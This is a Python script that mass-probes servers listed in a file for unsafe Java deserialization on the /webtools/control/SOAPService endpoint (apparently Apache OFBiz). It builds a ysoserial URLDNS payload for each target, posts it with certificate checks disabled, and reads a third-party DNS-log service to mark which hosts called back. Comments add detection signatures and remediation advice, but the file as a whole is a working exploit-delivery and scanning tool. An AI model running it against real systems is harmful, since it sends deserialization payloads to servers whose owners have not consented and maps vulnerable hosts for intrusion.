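#coding:utf-8
import binascii
import os
import re
import subprocess
import uuid

import requests
import urllib3

# Certificate warnings are silenced because the probe requests below are sent
# with verify=False (targets are expected to use self-signed certificates).
urllib3.disable_warnings()

# The DNS-log hostname comes from a remote HTTP response, so it is treated as
# untrusted: an 8-character first label followed by ordinary hostname labels.
_DNSLOG_HOST_RE = re.compile(r"[A-Za-z0-9-]{8}(?:\.[A-Za-z0-9-]+)+")

# Timeout (seconds) for calls to the DNS-log service; the original had none.
_DNSLOG_TIMEOUT = 10


def _build_payload(uid, dnslogdomain):
    """Return the hex-encoded ysoserial URLDNS object for one target.

    The object only causes a DNS lookup of ``<uid>.<dnslogdomain>`` when it is
    deserialized. Returns None when java/ysoserial cannot be run or produces
    no output, so that a stale or empty payload is never sent.
    """
    # Argument list, no shell: the hostname is never parsed by a shell and no
    # shared "tmp" file is written in the working directory.
    argv = [
        "java", "-jar", "ysoserial.jar", "URLDNS",
        "http://{0}.{1}".format(uid, dnslogdomain),
    ]
    try:
        proc = subprocess.run(argv, stdout=subprocess.PIPE)
    except OSError:
        return None
    if proc.returncode != 0 or not proc.stdout:
        return None
    return binascii.hexlify(proc.stdout).decode()


def main():
    """Check each URL in target.txt for unsafe Java deserialization on SOAPService.

    For every target a unique DNS name is embedded in a ysoserial URLDNS object,
    which is POSTed hex-encoded to ``/webtools/control/SOAPService`` (presumably
    the Apache OFBiz webtools endpoint -- confirm). A target is reported as
    vulnerable when its unique label later appears in the DNS log, i.e. the
    server deserialized the submitted object. Hits are written to a
    ``<uuid>.txt`` file.

    Notes for defenders: the request body carries hex text that starts with
    ``aced0005`` (the Java serialization stream header), and a vulnerable host
    resolves a 32-hex-character label under the DNS-log domain. Remediation is
    server-side: upgrade the affected application or keep this endpoint
    unreachable from untrusted networks.

    All lookups are recorded by a third-party DNS-log service that the tester
    does not control.
    """
    if not os.path.exists("target.txt"):
        raise SystemExit("put url in target.txt! ")
    if not os.path.exists("ysoserial.jar"):
        raise SystemExit("where is ysoserial.jar?")

    try:
        dnslogdomain = requests.get(
            "https://dns.xn--9tr.com/new_gen", timeout=_DNSLOG_TIMEOUT
        ).text.strip()
    except requests.RequestException:
        raise SystemExit("Maybe `dns.xn--9tr.com` is down..") from None
    # Reject anything that is not a plain hostname before it is used to build
    # a command line and a URL.
    if not _DNSLOG_HOST_RE.fullmatch(dnslogdomain):
        raise SystemExit("Maybe `dns.xn--9tr.com` is down..")
    print("[!] Your DnsLog Domain Is `{0}`".format(dnslogdomain))
    dnslogresurl = "https://dns.xn--9tr.com/" + dnslogdomain.split(".")[0]

    with open("target.txt") as f:
        # Blank lines would otherwise become a target named "".
        urls = [line.strip() for line in f if line.strip()]

    uuids = {}
    headers = {
        "user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36"
    }
    print("\n")
    print(" payload发送开始 ".center(50,"-"))
    for url in urls:
        uid = uuid.uuid1().hex
        payload = _build_payload(uid, dnslogdomain)
        if payload is None:
            print("[!] Could not build payload for {0}, skipped".format(url))
            continue
        uuids[url] = uid
        # NOTE(review): as listed, the body is only the hex string padded with
        # spaces; any markup the original wrapped around it is not visible in
        # this listing and is not reconstructed here.
        data = ''' {0} '''.format(payload)
        try:
            print("[-] Send payload to {0}".format(url))
            # verify=False: certificate validation is deliberately off for
            # the targets; the DNS-log calls above keep it on.
            requests.post(url+"/webtools/control/SOAPService",data=data,verify=False,headers=headers,timeout=5)
        except requests.RequestException as err:
            # Only network/HTTP errors are tolerated; Ctrl-C and programming
            # errors are no longer swallowed. The target stays in the result
            # set because the request may have been processed before the
            # error (e.g. a read timeout).
            print("[!] Request to {0} failed: {1}".format(url, err))
    print(" payload发送完毕 ".center(50,"-"))
    print("\n")
    print("---".center(50,"-"))

    # The log is read once, immediately after sending; a lookup that arrives
    # later is reported as a miss.
    try:
        res = requests.get(dnslogresurl, timeout=_DNSLOG_TIMEOUT).text
    except requests.RequestException:
        raise SystemExit("Maybe `dns.xn--9tr.com` is down..") from None

    success = []
    for target, uid in uuids.items():
        if uid in res:
            print("[+] {0} 漏洞存在".format(target))
            success.append(target)
        else:
            print("[!] {0} 漏洞不存在".format(target))
    print("---".center(50,"-"))

    filename = uuid.uuid1().hex+".txt"
    with open(filename,"w") as f:
        f.write("\n".join(success))
    print("[*] put res in {0}".format(filename))


if __name__ == "__main__":
    main()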